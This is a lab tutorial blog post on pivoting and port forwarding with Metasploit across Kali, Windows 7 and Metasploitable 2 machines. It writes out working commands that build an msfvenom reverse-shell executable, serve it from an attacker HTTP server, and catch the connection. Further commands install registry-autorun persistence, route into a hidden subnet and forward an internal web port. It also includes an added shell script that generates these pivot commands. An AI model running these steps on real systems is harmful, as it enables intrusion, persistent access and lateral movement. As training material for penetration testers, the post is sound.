PIVOTING & PORT FORWARDING

Clement 'Tino
7 min read · Mar 11, 2022


Image credits to Tutorialspoint.com

Pivoting is the technique of using a machine you have already compromised as a stepping stone to reach internal machines that you cannot access directly from the outside. Metasploit has built-in support for it, which is what this post uses.

In this post, I will be using 3 machines to demonstrate how this is done.

  • Kali Linux (attacking machine) — in the same subnet as Windows 7 only.
  • Windows 7 — in the same subnet as Kali and in the same subnet as Metasploitable 2 (it has a foot in both networks).
  • Metasploitable 2 — in the same subnet as Windows 7 only.

Basic networking tells us that two machines on the same subnet can talk to each other directly. Kali and Metasploitable 2 are on different subnets and there is no route between them, so it is not possible for the Kali machine to directly scan or enumerate the Met2 machine.

It would be possible if the Metasploitable 2 machine were reachable through a routed (or public) address that Kali could target directly, but in this lab we are working purely on the local networks.

How is it possible for one machine to be in two different subnets at the same time?

Ans: Because that machine has two network adapters, each configured with an address on a different subnet.

So the Windows 7 host has two network adapters. One (10.60.32.157) is on the 10.60.32.0/24 network, where Kali lives, and one (192.168.56.5) is on the 192.168.56.0/24 network, where Metasploitable 2 lives. Whether these addresses are historically "class A" or "class C" is irrelevant; what matters is that the two adapters sit on different subnets.

Let’s take a look at our Virtual Machines.

Below is the Kali Linux with an ip of 10.60.32.82.

Kali Linux (attacking machine) ip

This is the Metasploitable 2 machine with an IP of 192.168.56.7 (a different subnet from that of the Kali machine), meaning Kali cannot communicate with it directly.

Metasploitable 2 ip

And this is the Windows 7 machine with two network adapters: one which gives it the 192.168.56.5 address to communicate with the Metasploitable 2 machine, and one which gives it the 10.60.32.157 address to communicate with the Kali Linux machine.

Windows 7 machine ip

Scenario:

You’re an attacker in a black box environment, and your target was initially the Windows 7 machine. As usual, you begin with a scan, hoping to find a vulnerable service running on the target and an exploit for that vulnerability. You gain an initial foothold on the system, look for privilege escalation vectors and BAM! you’ve owned the system. Easy, right?

Now let’s try that.

Let’s nmap the windows 7 target.

sudo nmap -A -p- -T4 <windows7 ip>
nmap scan results

As shown above, the Windows 7 machine has nothing to go on apart from the SSH service running on it. If we knew the password for that SSH service it would have been sweet, but in this case we don’t, so let’s try another approach.

There are other methods for gaining access to a Windows machine. Here I’m going to go with the payload method: build a reverse-shell executable and get the user on the target to run it.

Let’s begin by creating our payload with msfvenom.

The syntax goes like this:

msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=<local ip> LPORT=<local port> -o payload.exe

where LHOST is the IP of the attacker machine and LPORT is the port on the attacker machine that the payload will connect back to.

creating your payload

Now the payload has been created as a Windows binary. Let’s set up our listener, which will be waiting for a connection from payload.exe the moment it’s executed on the Windows 7 machine.

I will be using metasploit’s multi handler to set up the listener. Launch metasploit with command:

msfconsole

now use multi handler as the listener with command

use multi/handler

set the payload type to the same one you used during the creation of payload.exe

set payload windows/meterpreter/reverse_tcp

Now check the options you have to set with:

show options

set the Listening host to the attacker’s ip.

set LHOST <Kali Linux ip>

set the LPORT to the port specified during the payload creation.

set LPORT <payload port>

now to start the listener, type:

run

Now the attacker machine is listening for connections from our payload.exe

setting up the listener

Now let’s find a way to get it onto the Windows 7 machine. What about hosting it on a web server and getting the Windows user to download it?

In the same directory where the payload is, let’s start a simple Python HTTP server which will host payload.exe. The command below is the Python 2 module; on a current Kali with only Python 3 use python3 -m http.server instead, which also listens on port 8000 by default.

python -m SimpleHTTPServer
python server

Now the server is running on port 8000 on the attacker’s local machine.

Now open any browser on your Windows 7 machine and type into the address bar:

http://<attacker's ip>:8000/payload.exe

Now save it and go to your Downloads folder, the downloaded payload.exe should be there.

downloading the payload

Now open the payload on the windows 7 machine.

executing the payload.exe

Now check the listener on the attacking machine, you’ll see a connection was sent back to it.

session opened

Now you get a meterpreter shell. Background that shell with bg (or background). Next, install a persistence module on the target so that if our meterpreter session dies we can always spawn a new one.

search for the persistence post-exploit module

search persistence

use it with:

use exploit/windows/local/persistence

look at the options to set with:

show options

Now set the session to the ID of the session we backgrounded (which is 1)

set session 1

set the LPORT to a different, unused port on the attacker machine. The persisted payload will call back to LHOST on this port, so you will need a second multi/handler listening there whenever you want it to reconnect.

set LPORT 1234

now run it to install the persistent VBScript on the target. The module drops a .vbs file in the target’s temp directory, adds an autorun registry key so it runs at logon, and prints the path of a cleanup resource script; keep that path so you can remove the persistence when the engagement ends.

run

Illustrated below:

setting persistence

After a successful run, you’ll see this:

VB script creation

now interact with the session we backgrounded:

sessions -i 1

switch from a meterpreter shell to a cmd shell with command:

shell

Now type ipconfig to check out the network interfaces of Windows 7

net interfaces of the target

As you can see above, there are two network interfaces, one which we already knew (10.60.32.157) and a different one we had no idea about.

Type exit to leave the cmd shell and return to the meterpreter prompt, then add that network range to our route list so that Metasploit can reach it through this session.

run autoroute -s 192.168.56.0/24
adding route

Now check all your added routes(you can add more) with:

run autoroute -p
route list

Now that we have added that network range to our route list, let’s scan the entire subnet to see which devices on that network are alive. Note that routes added with autoroute apply only to Metasploit modules (for example auxiliary/scanner/portscan/tcp with RHOSTS set to 192.168.56.0/24); a plain nmap run from Kali will not use them. To scan with Nmap, start auxiliary/server/socks_proxy in Metasploit, point proxychains at it, and run nmap with -sT -Pn, because only full TCP connects can be tunnelled through the pivot (no SYN scans, no ICMP ping).

After scanning, it became evident that there is another machine on that network (192.168.56.7) besides the Windows 7 host (192.168.56.5), and it had some juicy ports open.

PORTFORWARDING

Port forwarding lets us bind a port on our local machine that tunnels, through the meterpreter session, to a service on a remote host we cannot otherwise reach.

The 192.168.56.7 host has an HTTP server running on port 80. Let’s forward that to a local port (8181) on the attacker machine so that we can access it.

In a meterpreter shell, access the help page of the port forward command with:

portfwd -h
port forward help

Following the syntax from the help above, we can forward port 80 on the target to a local port (8181) on the attacker machine with the command:

portfwd add -l <local port> -p <remote port on targets machine> -r <target ip>

NB: Here the target (-r) is no longer the Windows 7 machine but the Metasploitable 2 machine (192.168.56.7).
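The whole pivot above, from reading the pivot host's ipconfig output through the route, the SOCKS proxy and the port forward, as one script. This is an added example, not the post's own commands: it assumes the real Metasploit modules post/multi/manage/autoroute and auxiliary/server/socks_proxy, a session ID of 1, local ports 1080 (SOCKS) and 8181 (forward), and a constructed ipconfig sample modelled on the Windows 7 host's two addresses. The helper functions also answer the earlier subnet question concretely: they compute the network from an address and its mask, which is how you tell whether two hosts can talk directly.

```shell
#!/bin/sh
# pivot_prep.sh (added example, not from the post): turn the pivot host's
# `ipconfig` output into the msfconsole commands the post types by hand.
# Module names are real; session ID, ports and sample ipconfig text are assumptions.

# dotted-quad IPv4 -> 32-bit integer
ip2int() {
    oifs=$IFS; IFS=.; set -- $1; IFS=$oifs
    echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

# 32-bit integer -> dotted-quad IPv4
int2ip() {
    v=$1
    echo "$(( (v >> 24) & 255 )).$(( (v >> 16) & 255 )).$(( (v >> 8) & 255 )).$(( v & 255 ))"
}

# netmask (255.255.255.0) -> prefix length (24): count the set bits
mask2prefix() {
    m=$(ip2int "$1"); n=0
    while [ "$m" -ne 0 ]; do n=$(( n + (m & 1) )); m=$(( m >> 1 )); done
    echo "$n"
}

# prefix length (24) -> netmask (255.255.255.0); 4294967295 is 0xFFFFFFFF
prefix2mask() {
    int2ip $(( (4294967295 << (32 - $1)) & 4294967295 ))
}

# address + mask -> network in CIDR form: 192.168.56.5 255.255.255.0 -> 192.168.56.0/24
net_cidr() {
    echo "$(int2ip $(( $(ip2int "$1") & $(ip2int "$2") )))/$(mask2prefix "$2")"
}

# Read Windows `ipconfig` text on stdin; print one network/prefix per IPv4 interface.
ipconfig_networks() {
    cr=$(printf '\r'); addr=""
    while IFS= read -r line; do
        line=${line%"$cr"}                       # tolerate CRLF pasted from the target
        case "$line" in
            *"IPv4 Address"*) addr=${line##*: } ;;
            *"Subnet Mask"*)  [ -n "$addr" ] && net_cidr "$addr" "${line##*: }"; addr="" ;;
        esac
    done
}

# pivot_rc SESSION ALREADY_REACHABLE_CIDR NET/PREFIX... -> msfconsole resource script
# that routes every other subnet through the session and starts a SOCKS proxy.
pivot_rc() {
    sess=$1; known=$2; shift 2
    for net in "$@"; do
        [ "$net" = "$known" ] && continue        # Kali already sits on this subnet
        printf 'use post/multi/manage/autoroute\nset SESSION %s\nset SUBNET %s\nset NETMASK %s\nrun\n' \
            "$sess" "${net%/*}" "$(prefix2mask "${net#*/}")"
    done
    # SOCKS5 on 127.0.0.1:1080 (assumed port); proxychains + `nmap -sT -Pn` can then use the routes
    printf 'use auxiliary/server/socks_proxy\nset SRVHOST 127.0.0.1\nset SRVPORT 1080\nset VERSION 5\nrun -j\n'
}

# portfwd_rc SESSION LPORT RHOST RPORT -> the same forward the post adds inside meterpreter,
# issued from msfconsole via `sessions -C`
portfwd_rc() {
    printf 'sessions -C "portfwd add -l %s -p %s -r %s" -i %s\n' "$2" "$4" "$3" "$1"
}

# Constructed ipconfig output modelled on the Windows 7 pivot host in this post.
sample_ipconfig() {
cat <<'EOF'
Windows IP Configuration

Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 10.60.32.157
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.60.32.1

Ethernet adapter Local Area Connection 2:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 192.168.56.5
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :
EOF
}

# Demo: Kali is on 10.60.32.0/24, so only 192.168.56.0/24 gets routed; then forward DVWA.
nets=$(sample_ipconfig | ipconfig_networks)
pivot_rc 1 10.60.32.0/24 $nets
portfwd_rc 1 8181 192.168.56.7 80
```

Replace sample_ipconfig with the real ipconfig output (or paste it into a file and redirect it into ipconfig_networks), save the printed commands as pivot.rc and load them with resource pivot.rc from msfconsole once the meterpreter session exists. With proxychains configured for socks5 127.0.0.1 1080, the scan is proxychains nmap -sT -Pn 192.168.56.7; SYN scans and ping probes cannot traverse the meterpreter tunnel, so -sT -Pn is not optional.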

Now that we have successfully forwarded the web server on the Met2 machine to our local system, let’s try to access it in a browser on the attacker machine at http://127.0.0.1:8181.

DVWA running on our localhost

You can google the DVWA default credentials and try them on this portal.

If I made any mistake anywhere, you can send me a DM on Twitter @tinopreter or on LinkedIn @ClementOseiSomuah
